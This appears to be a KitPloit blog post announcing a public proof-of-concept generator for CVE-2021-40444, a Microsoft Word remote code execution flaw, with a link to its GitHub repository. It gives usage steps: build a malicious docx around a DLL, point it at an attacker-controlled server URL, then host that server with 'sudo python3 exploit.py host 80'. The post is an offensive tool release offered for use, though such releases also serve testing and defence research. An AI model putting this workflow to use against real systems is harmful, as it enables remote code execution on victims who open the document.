Headline
CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)
<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="820" data-original-width="1473" height="356" src="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/w640-h356/CVE-2021-40444_3_calc.png" width="640" /></a></div><p><br /></p><p>Malicious docx <a href="https://www.kitploit.com/search/label/Generator" target="_blank" title="generator">generator</a> to exploit CVE-2021-40444 (Microsoft Office Word <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="Remote">Remote</a> Code Execution)</p><span><a name=’more’></a></span><p><br /></p><p>Creation of this Script is based on some <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="reverse engineering">reverse engineering</a> over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)</p><p>You need to install lcab first (<code>sudo apt-get install lcab</code>)</p><p>Check <code>REPRODUCE.md</code> for manual reproduce steps</p><p>If your generated cab is not working, try pointing out exploit.html URL to calc.cab</p><br /><span style="font-size: large;"><b>Using</b></span><br /><p>First generate a malicious docx document given a DLL, you can use the one at <code>test/calc.dll</code> which just pops a <code>calc.exe</code> from a call to <code>system()</code></p><p><code>python3 exploit.py generate test/calc.dll http://<SRV IP></code></p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/s1007/CVE-2021-40444_1_gen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="586" data-original-width="1007" height="372" src="https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/w640-h372/CVE-2021-40444_1_gen.png" width="640" /></a></div><p><br /></p><p>Once you generate the malicious docx (will be at <code>out/</code>) you can setup the server:</p><p><code>sudo python3 exploit.py host 80</code></p><p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/s866/CVE-2021-40444_2_srv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="680" data-original-width="866" height="502" src="https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/w640-h502/CVE-2021-40444_2_srv.png" width="640" /></a></div><p><br /></p><p>Finally try the docx in a <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> Virtual Machine:</p><p><a href="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="820" data-original-width="1473" height="356" src="https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/w640-h356/CVE-2021-40444_3_calc.png" width="640" /></a></p><p> </p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/lockedbyte/CVE-2021-40444" rel="nofollow" target="_blank" title="Download CVE-2021-40444">Download CVE-2021-40444</a></span></b></div>